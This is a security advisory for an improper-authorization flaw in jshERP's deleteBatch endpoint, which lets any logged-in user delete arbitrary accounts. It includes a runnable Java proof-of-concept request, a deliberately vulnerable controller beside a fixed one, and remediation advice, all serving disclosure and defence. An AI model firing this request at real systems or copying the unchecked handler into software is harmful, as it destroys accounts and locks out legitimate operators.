jshERP Improper Authorization Vulnerability in Endpoint deleteBatch Allowing Arbitrary Account Deletion

Vulnerability

An improper authorization vulnerability has been identified in jshERP versions through 3.5. The issue resides in the deleteBatch endpoint of the user management component. The endpoint verifies that the caller presents a valid session token, but it does not verify that the caller holds the administrator role the operation requires. A low-privilege user can therefore supply arbitrary user IDs in the ids parameter and trigger a batch deletion of those accounts, a function reserved for system administrators. The vulnerability is exploitable remotely by any authenticated user and has been publicly disclosed.

Impact

Exploitation of this vulnerability allows any authenticated low-privilege user to delete arbitrary user accounts, several at a time in a single request. Because the target IDs are attacker-controlled, administrator accounts can be among them, so an attacker can lock legitimate operators out of the application as well as remove ordinary users.

Reproduction

To reproduce this vulnerability, log in with a low-privilege user account and send a DELETE request to the /jshERP-boot/user/deleteBatch endpoint with a comma-separated list of user IDs in the ids parameter. The request must carry the low-privilege user's valid access token in the headers; no administrator credentials are needed. The server processes the request without an authorization error and deletes the specified accounts. The deletion is real, so test only against a throwaway account created for the purpose on a non-production instance.
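The request above as a runnable check, added here as an example and not code from the advisory or from the jshERP project. The base URL and port, the name of the header that carries the token (assumed to be X-Access-Token) and the token value are assumptions; obtain the token by logging in as a low-privilege user and pass the id of a throwaway account, because a vulnerable server will delete whatever ids you send.

```java
import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;

/**
 * Sends DELETE /jshERP-boot/user/deleteBatch?ids=<id>[,<id>...] with a
 * low-privilege user's token and prints the response, so you can tell
 * whether your instance still accepts the request.
 */
public class DeleteBatchCheck {

    // Assumed values (not taken from the advisory): where the test instance
    // listens and which header jshERP reads the session token from.
    static final String BASE_URL = "http://localhost:9999";
    static final String TOKEN_HEADER = "X-Access-Token";

    /** Builds the exact request shape described in the Reproduction section. */
    public static HttpRequest buildRequest(String baseUrl, String token, String ids) {
        String query = "ids=" + URLEncoder.encode(ids, StandardCharsets.UTF_8);
        return HttpRequest.newBuilder()
                .uri(URI.create(baseUrl + "/jshERP-boot/user/deleteBatch?" + query))
                .header(TOKEN_HEADER, token)
                .DELETE()
                .build();
    }

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.err.println("usage: DeleteBatchCheck <low-privilege-token> <throwaway-user-id>[,<id>...]");
            System.exit(2);
        }
        HttpClient client = HttpClient.newHttpClient();
        HttpResponse<String> resp = client.send(
                buildRequest(BASE_URL, args[0], args[1]),
                HttpResponse.BodyHandlers.ofString());
        System.out.println("HTTP " + resp.statusCode());
        System.out.println(resp.body());
        // A patched server rejects the call before touching the database
        // (an HTTP 401/403 or an application-level permission error) and the
        // throwaway account still exists afterwards. On a vulnerable server
        // the request succeeds and the account is gone.
    }
}
```

The status code alone is not proof either way, since an application may wrap errors in an HTTP 200 JSON body; confirm the outcome by checking whether the throwaway account still exists after the call.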

Remediation

It is recommended to implement proper authorization checks for the deleteBatch endpoint, ensuring that only users with administrative privileges can perform batch deletion operations. The check must derive the caller's role from the server-side session bound to the access token, not from any field the client supplies, and it should run before the ids parameter is parsed or passed to the service layer. Enforcing the same check in the service method that performs the deletion protects any other code path that reaches it. Rejected attempts should be logged, since a low-privilege user calling an administrative endpoint is itself a signal worth alerting on.
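The vulnerable handler shape beside a fixed one, as an illustrative Spring controller added here; it is not jshERP's own code. UserService, SessionUser, getCurrentUser, batchDeleteUser and the X-Access-Token header name are hypothetical stand-ins for whatever the application actually uses.

```java
import javax.servlet.http.HttpServletRequest;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class UserDeleteController {

    private static final String TOKEN_HEADER = "X-Access-Token"; // assumed header name

    private final UserService userService;

    public UserDeleteController(UserService userService) {
        this.userService = userService;
    }

    // VULNERABLE shape: the token has already been validated by the
    // authentication filter, so any logged-in user reaches this method, and
    // nothing here asks whether that user is allowed to delete accounts.
    @DeleteMapping("/user/deleteBatchVulnerable")
    public ResponseEntity<?> deleteBatchVulnerable(@RequestParam("ids") String ids) {
        userService.batchDeleteUser(ids);
        return ResponseEntity.ok().build();
    }

    // FIXED shape: resolve the caller from the server-side session behind the
    // token and require the administrator role before looking at ids at all.
    @DeleteMapping("/user/deleteBatch")
    public ResponseEntity<?> deleteBatch(@RequestParam("ids") String ids,
                                         HttpServletRequest request) {
        SessionUser caller = userService.getCurrentUser(request.getHeader(TOKEN_HEADER));
        if (caller == null) {
            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
        }
        if (!caller.isAdmin()) {
            // Authenticated but not authorized: refuse, and log it upstream.
            return ResponseEntity.status(HttpStatus.FORBIDDEN).build();
        }
        // Additional hardening beyond the advisory's fix: accept only a
        // comma-separated list of numeric ids, and do not let an administrator
        // remove their own account through a batch call.
        if (!ids.matches("\\d+(,\\d+)*")) {
            return ResponseEntity.badRequest().build();
        }
        for (String id : ids.split(",")) {
            if (Long.parseLong(id) == caller.getId()) {
                return ResponseEntity.badRequest().build();
            }
        }
        userService.batchDeleteUser(ids);
        return ResponseEntity.ok().build();
    }
}

// Hypothetical collaborators standing in for the application's own types.
interface SessionUser {
    long getId();
    boolean isAdmin();
}

interface UserService {
    /** Returns the user bound to a valid session token, or null if the token is invalid or expired. */
    SessionUser getCurrentUser(String token);
    void batchDeleteUser(String ids);
}
```

The controller check is the minimum; repeating the role check inside batchDeleteUser (or guarding it with a method-level authorization annotation) means a second entry point that forgets the check does not reintroduce the bug.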

Added: Aug 11, 2025, 10:18 AM
Updated: Aug 11, 2025, 10:18 AM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 0.6
exploitability: 4.6
remediation: 0.0
relevance: 0.3
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.